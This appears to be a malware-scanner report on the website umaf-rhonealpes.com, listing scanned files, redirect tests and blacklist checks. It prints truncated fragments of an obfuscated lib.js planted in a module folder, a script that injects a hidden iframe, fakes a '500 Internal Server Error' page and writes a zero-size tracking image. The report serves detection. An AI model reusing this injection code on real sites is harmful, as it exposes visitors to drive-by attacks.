Scanned pages/files
| Request | Server response | Status |
http://www.umaf-rhonealpes.com/ | 200 OK Content-Length: 55968 Content-Type: text/html | clean |
http://www.umaf-rhonealpes.com/modules/com_akeeba/?65558fd2852f05d4521353393a424fff=8840cbb9ac45a5a7e4c5f96b0e244d2f | 200 OK Content-Length: 16353 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://www.umaf-rhonealpes.com/modules/com_akeeba/lib.js | 200 OK Content-Length: 9609 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. function dQJ(M) { function sXQ(J) { var g = new Array(Math.ceil(J.length / 4)); for (var I = 0; I < g.length; I++) { g[I] = J.charCodeAt(I * 4) + (J.charCodeAt(I * 4 + 1) << 8) + (J.charCodeAt(I * 4 + 2) << 16) + (J.charCodeAt(I * 4 + 3) << 24); } return g; } function lOT(g) { var H = new Array(g.length); for (var I = 0; I < g.length; I++) { H[I] = Stri ...[3703 bytes skipped]... Decoded script: ...[1772 bytes skipped]... t;</div>'); document.title = '500 Internal Server Error'; document.body.style.background = '#FFFFFF'; addLoadEvent(function () { try { var body1 = document.getElementsByTagName('body')[0]; for (var i = body1.childNodes.length - 1; i >= 0; i--) { var child = body1.childNodes[i]; if (child.tagName != 'SCRIPT' && child.tagName != 'iframe' && child.id != 'mmmyyy') { child.parentNode.removeChild(child); } } document.getElementById('mmmyyy').style.height='100%'; } catch(e) {}});} try {document.writeln('<img src="cp.php" width="0" height="0" />');} catch(e) {}function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = ...[2311 bytes skipped]... | ||
http://www.umaf-rhonealpes.com/modules/com_akeeba/count.js | 200 OK Content-Length: 2056 Content-Type: application/javascript | clean |
http://www.statcounter.com/counter/counter.js | 200 OK Content-Length: 21407 Content-Type: application/x-javascript | clean |
http://www.umaf-rhonealpes.com/modules/com_akeeba/css.js | 200 OK Content-Length: 6853 Content-Type: application/javascript | clean |
http://www.umaf-rhonealpes.com/modules/com_akeeba/ | 200 OK Content-Length: 16300 Content-Type: text/html | clean |
http://www.umaf-rhonealpes.com/modules/com_akeeba/./ | 200 OK Content-Length: 16395 Content-Type: text/html | clean |
http://www.umaf-rhonealpes.com/modules/com_akeeba/./lib.js | 200 OK Content-Length: 9609 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. function dQJ(M) { function sXQ(J) { var g = new Array(Math.ceil(J.length / 4)); for (var I = 0; I < g.length; I++) { g[I] = J.charCodeAt(I * 4) + (J.charCodeAt(I * 4 + 1) << 8) + (J.charCodeAt(I * 4 + 2) << 16) + (J.charCodeAt(I * 4 + 3) << 24); } return g; } function lOT(g) { var H = new Array(g.length); for (var I = 0; I < g.length; I++) { H[I] = Stri ...[3703 bytes skipped]... Decoded script: ...[1772 bytes skipped]... t;</div>'); document.title = '500 Internal Server Error'; document.body.style.background = '#FFFFFF'; addLoadEvent(function () { try { var body1 = document.getElementsByTagName('body')[0]; for (var i = body1.childNodes.length - 1; i >= 0; i--) { var child = body1.childNodes[i]; if (child.tagName != 'SCRIPT' && child.tagName != 'iframe' && child.id != 'mmmyyy') { child.parentNode.removeChild(child); } } document.getElementById('mmmyyy').style.height='100%'; } catch(e) {}});} try {document.writeln('<img src="cp.php" width="0" height="0" />');} catch(e) {}function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = ...[2311 bytes skipped]... | ||
http://www.umaf-rhonealpes.com/modules/com_akeeba/./count.js | 200 OK Content-Length: 2056 Content-Type: application/javascript | clean |
http://www.umaf-rhonealpes.com/modules/com_akeeba/./css.js | 200 OK Content-Length: 6853 Content-Type: application/javascript | clean |
http://www.umaf-rhonealpes.com/modules/com_akeeba/././ | 200 OK Content-Length: 16245 Content-Type: text/html | clean |
http://www.umaf-rhonealpes.com/modules/com_akeeba/././lib.js | 200 OK Content-Length: 9609 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. function dQJ(M) { function sXQ(J) { var g = new Array(Math.ceil(J.length / 4)); for (var I = 0; I < g.length; I++) { g[I] = J.charCodeAt(I * 4) + (J.charCodeAt(I * 4 + 1) << 8) + (J.charCodeAt(I * 4 + 2) << 16) + (J.charCodeAt(I * 4 + 3) << 24); } return g; } function lOT(g) { var H = new Array(g.length); for (var I = 0; I < g.length; I++) { H[I] = Stri ...[3703 bytes skipped]... Decoded script: ...[1772 bytes skipped]... t;</div>'); document.title = '500 Internal Server Error'; document.body.style.background = '#FFFFFF'; addLoadEvent(function () { try { var body1 = document.getElementsByTagName('body')[0]; for (var i = body1.childNodes.length - 1; i >= 0; i--) { var child = body1.childNodes[i]; if (child.tagName != 'SCRIPT' && child.tagName != 'iframe' && child.id != 'mmmyyy') { child.parentNode.removeChild(child); } } document.getElementById('mmmyyy').style.height='100%'; } catch(e) {}});} try {document.writeln('<img src="cp.php" width="0" height="0" />');} catch(e) {}function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = ...[2311 bytes skipped]... | ||
http://www.umaf-rhonealpes.com/modules/com_akeeba/././count.js | 200 OK Content-Length: 2056 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: umaf-rhonealpes.com
Result:
GET / HTTP/1.1
Host: umaf-rhonealpes.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: umaf-rhonealpes.com
Referer: http://www.google.com/search?q=umaf-rhonealpes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: umaf-rhonealpes.com
Referer: http://www.google.com/search?q=umaf-rhonealpes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=umaf-rhonealpes.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://umaf-rhonealpes.com/
Result: umaf-rhonealpes.com is not infected or malware details are not published yet.
Result: umaf-rhonealpes.com is not infected or malware details are not published yet.